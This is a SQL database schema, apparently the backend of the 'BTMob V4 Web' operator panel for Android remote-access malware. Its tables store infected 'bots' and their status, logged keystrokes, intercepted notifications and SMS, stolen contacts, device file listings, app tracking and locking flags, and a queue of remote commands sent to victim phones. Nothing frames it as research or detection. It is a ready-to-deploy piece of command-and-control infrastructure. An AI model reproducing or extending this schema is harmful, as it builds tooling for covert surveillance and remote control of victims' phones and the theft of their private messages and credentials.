-- Supabase PostgreSQL Database Schema for BTMob V4 Web
-- This script creates the tables and sets up Row Level Security (RLS) for authenticated operators.

-- 1. Create BOTS table
CREATE TABLE IF NOT EXISTS bots (
  id TEXT PRIMARY KEY,
  name TEXT NOT NULL,
  model TEXT,
  country TEXT,
  "countryCode" TEXT,
  ip TEXT,
  status TEXT DEFAULT 'offline' CHECK (status IN ('online', 'offline')),
  battery INTEGER DEFAULT 100,
  "batteryCharging" BOOLEAN DEFAULT false,
  network TEXT DEFAULT 'offline',
  "screenState" TEXT DEFAULT 'unlocked' CHECK ("screenState" IN ('locked', 'unlocked', 'black', 'update', 'battery_dead')),
  "activeApp" TEXT,
  "lastActive" TEXT,
  tag TEXT,
  activities TEXT DEFAULT '0',
  keystrokes TEXT DEFAULT '0',
  notifications TEXT DEFAULT '0',
  visitedapps TEXT DEFAULT '0',
  visitedlinks TEXT DEFAULT '0',
  livenotify TEXT DEFAULT '0',
  livescreen TEXT DEFAULT '0',
  autoj TEXT DEFAULT '0'
);

-- Enable RLS and add policies
ALTER TABLE bots ENABLE ROW LEVEL SECURITY;
CREATE POLICY "Allow all for authenticated users" ON bots FOR ALL TO authenticated USING (true) WITH CHECK (true);

-- 2. Create KEYLOGS table
CREATE TABLE IF NOT EXISTS keylogs (
  id TEXT PRIMARY KEY,
  "botId" TEXT REFERENCES bots(id) ON DELETE CASCADE,
  timestamp TEXT NOT NULL,
  "appName" TEXT,
  text TEXT NOT NULL
);

ALTER TABLE keylogs ENABLE ROW LEVEL SECURITY;
CREATE POLICY "Allow all for authenticated users" ON keylogs FOR ALL TO authenticated USING (true) WITH CHECK (true);

-- 3. Create NOTIFICATIONS table
CREATE TABLE IF NOT EXISTS notifications (
  id TEXT PRIMARY KEY,
  "botId" TEXT REFERENCES bots(id) ON DELETE CASCADE,
  timestamp TEXT NOT NULL,
  "appName" TEXT,
  title TEXT NOT NULL,
  content TEXT NOT NULL
);

ALTER TABLE notifications ENABLE ROW LEVEL SECURITY;
CREATE POLICY "Allow all for authenticated users" ON notifications FOR ALL TO authenticated USING (true) WITH CHECK (true);

-- 4. Create SMS table
CREATE TABLE IF NOT EXISTS sms (
  id TEXT PRIMARY KEY,
  "botId" TEXT REFERENCES bots(id) ON DELETE CASCADE,
  timestamp TEXT NOT NULL,
  phone TEXT NOT NULL,
  message TEXT NOT NULL,
  type TEXT NOT NULL CHECK (type IN ('received', 'sent'))
);

ALTER TABLE sms ENABLE ROW LEVEL SECURITY;
CREATE POLICY "Allow all for authenticated users" ON sms FOR ALL TO authenticated USING (true) WITH CHECK (true);

-- 5. Create CONTACTS table
CREATE TABLE IF NOT EXISTS contacts (
  id BIGINT GENERATED BY DEFAULT AS IDENTITY PRIMARY KEY,
  "botId" TEXT REFERENCES bots(id) ON DELETE CASCADE,
  name TEXT NOT NULL,
  phone TEXT NOT NULL
);

ALTER TABLE contacts ENABLE ROW LEVEL SECURITY;
CREATE POLICY "Allow all for authenticated users" ON contacts FOR ALL TO authenticated USING (true) WITH CHECK (true);

-- 6. Create APPS table
CREATE TABLE IF NOT EXISTS apps (
  "botId" TEXT REFERENCES bots(id) ON DELETE CASCADE,
  "packageName" TEXT NOT NULL,
  "appName" TEXT NOT NULL,
  "isSystem" BOOLEAN DEFAULT false,
  tracked BOOLEAN DEFAULT false,
  locked BOOLEAN DEFAULT false,
  enabled BOOLEAN DEFAULT true,
  PRIMARY KEY ("botId", "packageName")
);

ALTER TABLE apps ENABLE ROW LEVEL SECURITY;
CREATE POLICY "Allow all for authenticated users" ON apps FOR ALL TO authenticated USING (true) WITH CHECK (true);

-- 7. Create FILES table
CREATE TABLE IF NOT EXISTS files (
  id BIGINT GENERATED BY DEFAULT AS IDENTITY PRIMARY KEY,
  "botId" TEXT REFERENCES bots(id) ON DELETE CASCADE,
  name TEXT NOT NULL,
  path TEXT NOT NULL,
  size BIGINT DEFAULT 0,
  "isDir" BOOLEAN DEFAULT false,
  modified TEXT NOT NULL
);

ALTER TABLE files ENABLE ROW LEVEL SECURITY;
CREATE POLICY "Allow all for authenticated users" ON files FOR ALL TO authenticated USING (true) WITH CHECK (true);

-- 8. Create COMMANDS table
CREATE TABLE IF NOT EXISTS commands (
  id TEXT PRIMARY KEY,
  "botId" TEXT REFERENCES bots(id) ON DELETE CASCADE,
  command TEXT NOT NULL,
  arguments TEXT,
  status TEXT DEFAULT 'pending' CHECK (status IN ('pending', 'executed', 'failed')),
  "createdAt" TIMESTAMP WITH TIME ZONE DEFAULT NOW()
);

ALTER TABLE commands ENABLE ROW LEVEL SECURITY;
CREATE POLICY "Allow all for authenticated users" ON commands FOR ALL TO authenticated USING (true) WITH CHECK (true);

-- 9. Create SYSTEM LOGS table
CREATE TABLE IF NOT EXISTS logs (
  id TEXT PRIMARY KEY,
  timestamp TEXT NOT NULL,
  "botId" TEXT REFERENCES bots(id) ON DELETE CASCADE,
  "botName" TEXT,
  type TEXT NOT NULL CHECK (type IN ('info', 'warning', 'error', 'success')),
  message TEXT NOT NULL
);

ALTER TABLE logs ENABLE ROW LEVEL SECURITY;
CREATE POLICY "Allow all for authenticated users" ON logs FOR ALL TO authenticated USING (true) WITH CHECK (true);

-- Indexes for performance
CREATE INDEX IF NOT EXISTS idx_keylogs_botId ON keylogs("botId");
CREATE INDEX IF NOT EXISTS idx_notifications_botId ON notifications("botId");
CREATE INDEX IF NOT EXISTS idx_sms_botId ON sms("botId");
CREATE INDEX IF NOT EXISTS idx_apps_botId ON apps("botId");
CREATE INDEX IF NOT EXISTS idx_files_botId ON files("botId");
CREATE INDEX IF NOT EXISTS idx_commands_botId ON commands("botId");
CREATE INDEX IF NOT EXISTS idx_logs_botId ON logs("botId");
